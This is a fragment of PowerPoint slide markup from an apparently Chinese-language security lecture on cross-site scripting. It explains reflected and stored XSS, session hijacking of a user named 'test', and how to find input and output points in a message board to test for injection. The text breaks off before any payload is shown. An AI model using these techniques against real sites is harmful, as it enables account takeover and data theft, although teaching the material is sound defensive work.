              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的身份 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.secbug.org</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>从而获取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的敏感信息。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>以上步骤通过使用反射型</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漏洞达到以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的身份登录网站的效果，这就是</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341630">
              <a:lnSpc>
                <a:spcPts val="850"/>
              </a:lnSpc>
            </a:pP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较严重的危害。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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5"/>
            <a:ext cx="3463290" cy="1798320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="93980" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="58419">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储型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又被称为持久性</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储型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是最危险的一种跨站脚</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>本</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="52705" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>允许用户存储数据的</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eb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用程序都可能会出现存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞，当攻击者提交一 段</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代码后，被服务器端接收并存储</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当攻击者再次访问某个页面</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这段</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码被程序读出来响应给浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>成</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跨站攻击，这种攻击就是存储型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a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="67310" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储型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与反射型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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>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相比，具有更高的隐蔽</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>性</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，危害性也更大。 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>它们之间最大的区别在于反射型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与</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的执行都必须依靠用户手动去触 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>发，而存储型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却不需</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>要</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面是一个比较常见的存储型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场景示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341630" marR="124460" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="270"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在测试是否存在</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时，首先要确定输入点与输出</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>点</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，例如，若要在留言内 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>容上测试</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漏洞，首先就要去寻找留言内容输</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>出</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（显示）的地方是在标签</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341630">
              <a:lnSpc>
                <a:spcPts val="750"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>内还是在标签属性内，或者在其他什么地</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，如果输出的数据在标签属性内，</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341630">
              <a:lnSpc>
                <a:spcPts val="860"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>那么</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码是不会被执行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。如：</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738009" y="2909316"/>
            <a:ext cx="3848099" cy="340613"/>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308487" y="621993"/>
            <a:ext cx="1593850" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">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0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505590" y="1676068"/>
            <a:ext cx="3119755" cy="433705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1270" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>终在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文档中代码变为：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>样就可以闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
